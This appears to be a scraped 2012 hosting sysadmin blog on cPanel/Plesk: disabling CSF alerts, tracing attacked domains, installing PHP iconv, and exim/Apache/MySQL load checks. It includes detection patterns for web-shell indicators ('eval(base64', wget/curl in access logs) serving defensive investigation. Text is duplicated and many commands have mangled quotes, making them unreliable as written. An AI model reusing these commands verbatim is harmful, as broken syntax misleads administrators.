# Send an email alert if an IP address is blocked by one of the [*] triggers
LF_EMAIL_ALERT = “1?
# Send an email alert if an IP address is blocked by one of the [*] triggersLF_EMAIL_ALERT = “1?
Sunday, 8 July 2012
How to disable CSF IP address block alert email
vi /etc/csf/csf.conf
# Send an email alert if an IP address is blocked by one of the [*] triggersLF_EMAIL_ALERT = “1?
# Send an email alert if an IP address is blocked by one of the [*] triggersLF_EMAIL_ALERT = “1?
Thursday, 5 July 2012
How to detect domain being Attacked or Attacking Out in cPanel
What we can do to find out which domain being attacked or attacking out from/to the server. Its no matter how this could happen, we need to stop that from happenning and turn our server stable. Its better to do this process in real-time within the time frame of server being attacked or the server others to make sure we can gather enough information, prove and logs. Its also recommended to document your process of troubleshooting for your reference. Believe me you will need it in future.
As for me, I will do basic checking as below:
1. Check overall server load summary using top command:
# top –c
2. Using the same command, we can monitor which process has taken high resource usage by sorting memory (Shift+M) or sorting CPU usage (Shift+P)
3. Check the network and analyse which connection flooding your server. Following command might be useful:
3.1 Check and sort number of network statistics connected to the server:
# netstat –anp |grep ‘tcp|udp’ | awk ‘{print $5}’ | cut –d: –f1 | sort | uniq –c | sort –n
3.2 If you have APFinstalled and using kernel older than 2.6.20, you can check the connection tracking table:
# cat /proc/net/ip_conntrack | cut –d ’ ’ –f 10 | cut –d ‘=’ –f 2 | sort | uniq –c | sort –nr | head –n 10
3.3 Do tcpdump to analyse packet that transmitted from/to your server. Following command might help to analyse any connection to eth0interface port 53 (DNS):
# tcpdump –vvxXlnni eth0 port 53 | grep A? | awk –F? ‘{print $2}’
4. Analyse Apache status page at WHM –> Server Status –> Apache Status. To do this via command line, you can run following command:
# service httpd fullstatus
5. Analyse Daily process logs at WHM –> Server Status –> Daily Process Logs. Find any top 5 users which consume most CPU percentage, memory and SQL process
After that, we should see some suspected account/process/user which occupied much resources either on CPU, memory or network connections.
Up until this part, we should shorlist any suspected account.
Then from the suspected account, we should do any step advised as below:
6. Scan the public_html directory of suspected user with anti virus. We can use clamav, but make sure the virus definition is updated before we do this:
6.1 Update clamavvirus definition:
# freshclam
6.2 Scan the public_html directory of the suspected user recursively with scan result logged to scanlog.txt:
# cd /home/user/public_html
# clamscan –i –r –l scanlog.txt &
6.3 Analyse any suspected files found by clamav and quarantine them. Make sure the file cannot be executed by chmod it to 600
7. Find any PHP files which contain suspicious characteristic like base64 encoded and store it into text file called scan_base64.txt.
Following command might help:
# cd /home/user/public_html
# grep –lir “eval(base64” *.php > scan_base64.txt
8. Scan the Apacheaccess log from raw log for any suspicious activities. Following command might help to find any scripting
activities happened in all domains via Apache:
# find /usr/local/apache/domlogs –exec egrep –iH ‘(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20? {} ;
9. Analysing AWstats and bandwidth usage also get more clues. Go to cPanel > suspected domain > Logs > Awstats.
In the AWstats page, check the Hosts, Pages-URL or any related section. Example as below:
There are various way to help you in executing this task. As for me, above said steps should be enough to detect any domain/account
which attacking out or being attacked. Different administrator might using different approach in order to produce same result.
As for me, I will do basic checking as below:
1. Check overall server load summary using top command:
# top –c
2. Using the same command, we can monitor which process has taken high resource usage by sorting memory (Shift+M) or sorting CPU usage (Shift+P)
3. Check the network and analyse which connection flooding your server. Following command might be useful:
3.1 Check and sort number of network statistics connected to the server:
# netstat –anp |grep ‘tcp|udp’ | awk ‘{print $5}’ | cut –d: –f1 | sort | uniq –c | sort –n
3.2 If you have APFinstalled and using kernel older than 2.6.20, you can check the connection tracking table:
# cat /proc/net/ip_conntrack | cut –d ’ ’ –f 10 | cut –d ‘=’ –f 2 | sort | uniq –c | sort –nr | head –n 10
3.3 Do tcpdump to analyse packet that transmitted from/to your server. Following command might help to analyse any connection to eth0interface port 53 (DNS):
# tcpdump –vvxXlnni eth0 port 53 | grep A? | awk –F? ‘{print $2}’
4. Analyse Apache status page at WHM –> Server Status –> Apache Status. To do this via command line, you can run following command:
# service httpd fullstatus
5. Analyse Daily process logs at WHM –> Server Status –> Daily Process Logs. Find any top 5 users which consume most CPU percentage, memory and SQL process
After that, we should see some suspected account/process/user which occupied much resources either on CPU, memory or network connections.
Up until this part, we should shorlist any suspected account.
Then from the suspected account, we should do any step advised as below:
6. Scan the public_html directory of suspected user with anti virus. We can use clamav, but make sure the virus definition is updated before we do this:
6.1 Update clamavvirus definition:
# freshclam
6.2 Scan the public_html directory of the suspected user recursively with scan result logged to scanlog.txt:
# cd /home/user/public_html
# clamscan –i –r –l scanlog.txt &
6.3 Analyse any suspected files found by clamav and quarantine them. Make sure the file cannot be executed by chmod it to 600
7. Find any PHP files which contain suspicious characteristic like base64 encoded and store it into text file called scan_base64.txt.
Following command might help:
# cd /home/user/public_html
# grep –lir “eval(base64” *.php > scan_base64.txt
8. Scan the Apacheaccess log from raw log for any suspicious activities. Following command might help to find any scripting
activities happened in all domains via Apache:
# find /usr/local/apache/domlogs –exec egrep –iH ‘(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20? {} ;
9. Analysing AWstats and bandwidth usage also get more clues. Go to cPanel > suspected domain > Logs > Awstats.
In the AWstats page, check the Hosts, Pages-URL or any related section. Example as below:
There are various way to help you in executing this task. As for me, above said steps should be enough to detect any domain/account
which attacking out or being attacked. Different administrator might using different approach in order to produce same result.
cPanel not showing FTP user accounts
This issue was due to the missing entries in the /etc/proftpd/username file.
For fixing this just issue the following command:-
# /scripts/ftpupdate.
This will sync the passwords of all the accounts in the servers
For fixing this just issue the following command:-
# /scripts/ftpupdate.
This will sync the passwords of all the accounts in the servers
Monday, 2 July 2012
Php module installation steps :iconv
Overview :
Installing a single php extension without recompiling PHP is never been a difficult job but most of the people doesn’t know it which leads to re-compile whole php.. In this article i will explain how can you add new php extension without recompiling whole php.
In our example, i will tell you how can you add iconv php extension without recompiling PHP.
root@sysadmin [~]# php -m
To list all the php modules installed in the server
root@sysadmin[~]# php -m|grep iconv
To search for the php module iconv in the module list installed in the server
=============
root@sysadmin [~]# cd /home/cpeasyapache/src/php-5.2.9/ext/
root@sysadmin [/home/cpeasyapache/src/php-5.2.9/ext]# cd iconv/
root@sysadmin [/home/cpeasyapache/src/php-5.2.9/ext/iconv]# phpize
Configuring for:
PHP Api Version: 20041225
Zend Module Api No: 20060613
Zend Extension Api No: 220060519
===============
Phpize-- with an example
------
The phpize command is used to prepare the build environment for a PHP extension. In the following sample, the sources for an extension are in a directory named extname:
$ cd extname
$ phpize
$ ./configure
$ make
# make install
----------------------
You can can see iconv php extension is installed under php extensions directory:
Enable iconv PHP extension in php.ini
Verify iconv :
Output:
iconv support => enabled
Installing a single php extension without recompiling PHP is never been a difficult job but most of the people doesn’t know it which leads to re-compile whole php.. In this article i will explain how can you add new php extension without recompiling whole php.
In our example, i will tell you how can you add iconv php extension without recompiling PHP.
root@sysadmin [~]# php -m
To list all the php modules installed in the server
root@sysadmin[~]# php -m|grep iconv
To search for the php module iconv in the module list installed in the server
=============
root@sysadmin [~]# cd /home/cpeasyapache/src/php-5.2.9/ext/
root@sysadmin [/home/cpeasyapache/src/php-5.2.9/ext]# cd iconv/
root@sysadmin [/home/cpeasyapache/src/php-5.2.9/ext/iconv]# phpize
Configuring for:
PHP Api Version: 20041225
Zend Module Api No: 20060613
Zend Extension Api No: 220060519
===============
Phpize-- with an example
------
The phpize command is used to prepare the build environment for a PHP extension. In the following sample, the sources for an extension are in a directory named extname:
$ cd extname
$ phpize
$ ./configure
$ make
# make install
----------------------
You can can see iconv php extension is installed under php extensions directory:
ls /usr/local/lib/php/extensions/no-debug-non-zts-20060613/iconv.soEnable iconv PHP extension in php.ini
echo "extension=iconv.so" >> /usr/local/lib/php.iniVerify iconv :
php -i | grep -i "iconv support"Output:
iconv support => enabled
Saturday, 16 June 2012
How to update stats in Plesk ?
Sometimes the webstat’s for a domain or for all domains on the server does not update automatically , in that case you can update the stat’s on the server easily by running the below commands :
To update the webstats for a particular domain :
root@server[#] /usr/local/psa/admin/sbin/statistics –calculate-one –domain-name=domainname
Note : Replace domain.com with the actual d
Thursday, 31 May 2012
Shared IP Vs. Dedicated IP
Difference Between Shared IP and dedicated IP
All computers are connected to the Internet is assigned a unique IP address for the purposes of communication. An IP address is a 32-bit numeric address usually expressed as 4 numbers from 0-255 separated by dots, for example 192.168.0.123. There are billions of addresses possible, however, the number is finite.
All computers are connected to the Internet is assigned a unique IP address for the purposes of communication. An IP address is a 32-bit numeric address usually expressed as 4 numbers from 0-255 separated by dots, for example 192.168.0.123. There are billions of addresses possible, however, the number is finite.
How to Monitor Linux Server
Here you will get all Good tricks and tips how to monitor Linux Server or how to manage Linux Server if its causing load, How to find Spammer, how to check http and mysql processes.
General Commands,
To check server load and which users are logged on the server with IP address you can fire this command
w
To check for the server load and watch for process
top
top –d2
top –c d2
Memory status
free –m
To see all processes running on the server
ps –aufx
With above commands you can which process is causing load on the server after that you can go with next steps.
If you see many processes of exim then you can check exim in more detail. shows the total no of email in qmail
exim –bpc
Print a listing of the messages in the queue
exim -bp
Following command will show path to the script being utilized to send mail
ps -C exim -fH eww
ps -C exim -fH eww | grep home
cd /var/spool/exim/input/
egrep "X-PHP-Script" * -R
Shows no of frozen emails
exim -bpr | grep frozen | wc -l
To remove FROZEN mails from the server
exim -bp | exiqgrep -i | xargs exim -Mrm
exiqgrep -z -i | xargs exim –Mrm
Check for spamming if anybody is using php script for sending mail through home
tail -f /var/log/exim_mainlog | grep home
If anyone is spamming from /tmp
tail -f /var/log/exim_mainlog | grep /tmp
To display the IP and no of tries done bu the IP to send mail but rejected by the server.
tail -3000 /var/log/exim_mainlog |grep ‘rejected RCPT’ |awk ‘{print$4}’|awk -F[ '{print $2} '|awk -F] ‘{print $1} ‘|sort | uniq -c | sort -k 1 -nr | head -n 5
Shows the connections from a certain ip to the SMTP server
netstat -plan|grep :25|awk {‘print $5?}|cut -d: -f 1|sort|uniq -c|sort -nk 1
To shows the domain name and the no of emails sent by that domain
exim -bp | exiqsumm | more
If spamming from outside domain then you can block that domain or email id on the server
pico /etc/antivirus.exim
Add the following lines:
if $header_from: contains “name@domain.com”
then
seen finish
endif
Catching spammer
Check mail stats
exim -bp | exiqsumm | more
Following command will show you the maximum no of email currently in the mail queue have from or to the email address in the mail queue with exact figure.
exim -bpr | grep “” | awk ‘{print $4}’|grep -v “” | sort | uniq -c | sort -n
That will show you the maximum no of email currently in the mail queue have for the domain or from the domain with number.
exim -bpr | grep “” | awk ‘{print $4}’|grep -v “” |awk -F “@” ‘{ print $2}’ | sort | uniq -c | sort -n
Check if any php script is causing the mass mailing with
cd /var/spool/exim/input
egrep “X-PHP-Script” * -R
Just cat the ID that you get and you will be able to check which script is here causing problem for you.
To Remove particular email account email
exim -bpr |grep “ragnarockradio.org”|awk {‘print $3?}|xargs exim -Mrm
If Mysql causing the load so you can use following commands to check it.
mysqladmin pr
mysqladmin -u root processlist
mysqladmin version
watch mysqladmin proc
If Apache causing the load so check using following commands.
netstat -ntu | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort –n
netstat -an |grep :80 |wc –l
netstat -n | grep :80 | wc -l;uptime ; netstat -n | wc –l
netstat –tupl
pidof httpd
history | netstat
lsof -p pid
If mysql is causing load so you can check it using following commands.
mysqladmin -u root processlist
mysqladmin version
watch mysqladmin proc
mysqladmin -u root processlist
Other Useful Commands
To check ipd of php
pidof php
lsof -p pid
netstat -an |grep :80 |wc –l
netstat -ntu | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n
netstat -na |grep :80 |sort
Use below mentioned command to get top memory consuming processes
ps aux | head -1;ps aux –no-headers| sort -rn +3 | head
Use below command to get top cpu consuming processes
ps aux | head -1;ps aux –no-headers | sort -rn +2 |more
You can check if any backup is going on, run the following commands
ps aux | grep pkg
ps aux | grep gzip
ps aux | grep backup
We can trace the user responsible for high web server resource usage by the folowing command
cat /etc/httpd/logs/access_log | grep mp3
cat /etc/httpd/logs/access_log | grep rar
cat /etc/httpd/logs/access_log | grep wav etc
cat /etc/httpd/logs/access_log | grep 408 can be used to check for DDOS attacks on the server.
cat /etc/httpd/logs/access_log | grep rar
General Commands,
To check server load and which users are logged on the server with IP address you can fire this command
w
To check for the server load and watch for process
top
top –d2
top –c d2
Memory status
free –m
To see all processes running on the server
ps –aufx
With above commands you can which process is causing load on the server after that you can go with next steps.
If you see many processes of exim then you can check exim in more detail. shows the total no of email in qmail
exim –bpc
Print a listing of the messages in the queue
exim -bp
Following command will show path to the script being utilized to send mail
ps -C exim -fH eww
ps -C exim -fH eww | grep home
cd /var/spool/exim/input/
egrep "X-PHP-Script" * -R
Shows no of frozen emails
exim -bpr | grep frozen | wc -l
To remove FROZEN mails from the server
exim -bp | exiqgrep -i | xargs exim -Mrm
exiqgrep -z -i | xargs exim –Mrm
Check for spamming if anybody is using php script for sending mail through home
tail -f /var/log/exim_mainlog | grep home
If anyone is spamming from /tmp
tail -f /var/log/exim_mainlog | grep /tmp
To display the IP and no of tries done bu the IP to send mail but rejected by the server.
tail -3000 /var/log/exim_mainlog |grep ‘rejected RCPT’ |awk ‘{print$4}’|awk -F[ '{print $2} '|awk -F] ‘{print $1} ‘|sort | uniq -c | sort -k 1 -nr | head -n 5
Shows the connections from a certain ip to the SMTP server
netstat -plan|grep :25|awk {‘print $5?}|cut -d: -f 1|sort|uniq -c|sort -nk 1
To shows the domain name and the no of emails sent by that domain
exim -bp | exiqsumm | more
If spamming from outside domain then you can block that domain or email id on the server
pico /etc/antivirus.exim
Add the following lines:
if $header_from: contains “name@domain.com”
then
seen finish
endif
Catching spammer
Check mail stats
exim -bp | exiqsumm | more
Following command will show you the maximum no of email currently in the mail queue have from or to the email address in the mail queue with exact figure.
exim -bpr | grep “” | awk ‘{print $4}’|grep -v “” | sort | uniq -c | sort -n
That will show you the maximum no of email currently in the mail queue have for the domain or from the domain with number.
exim -bpr | grep “” | awk ‘{print $4}’|grep -v “” |awk -F “@” ‘{ print $2}’ | sort | uniq -c | sort -n
Check if any php script is causing the mass mailing with
cd /var/spool/exim/input
egrep “X-PHP-Script” * -R
Just cat the ID that you get and you will be able to check which script is here causing problem for you.
To Remove particular email account email
exim -bpr |grep “ragnarockradio.org”|awk {‘print $3?}|xargs exim -Mrm
If Mysql causing the load so you can use following commands to check it.
mysqladmin pr
mysqladmin -u root processlist
mysqladmin version
watch mysqladmin proc
If Apache causing the load so check using following commands.
netstat -ntu | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort –n
netstat -an |grep :80 |wc –l
netstat -n | grep :80 | wc -l;uptime ; netstat -n | wc –l
netstat –tupl
pidof httpd
history | netstat
lsof -p pid
If mysql is causing load so you can check it using following commands.
mysqladmin -u root processlist
mysqladmin version
watch mysqladmin proc
mysqladmin -u root processlist
Other Useful Commands
To check ipd of php
pidof php
lsof -p pid
netstat -an |grep :80 |wc –l
netstat -ntu | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n
netstat -na |grep :80 |sort
Use below mentioned command to get top memory consuming processes
ps aux | head -1;ps aux –no-headers| sort -rn +3 | head
Use below command to get top cpu consuming processes
ps aux | head -1;ps aux –no-headers | sort -rn +2 |more
You can check if any backup is going on, run the following commands
ps aux | grep pkg
ps aux | grep gzip
ps aux | grep backup
We can trace the user responsible for high web server resource usage by the folowing command
cat /etc/httpd/logs/access_log | grep mp3
cat /etc/httpd/logs/access_log | grep rar
cat /etc/httpd/logs/access_log | grep wav etc
cat /etc/httpd/logs/access_log | grep 408 can be used to check for DDOS attacks on the server.
cat /etc/httpd/logs/access_log | grep rar
Subscribe to:
Posts (Atom)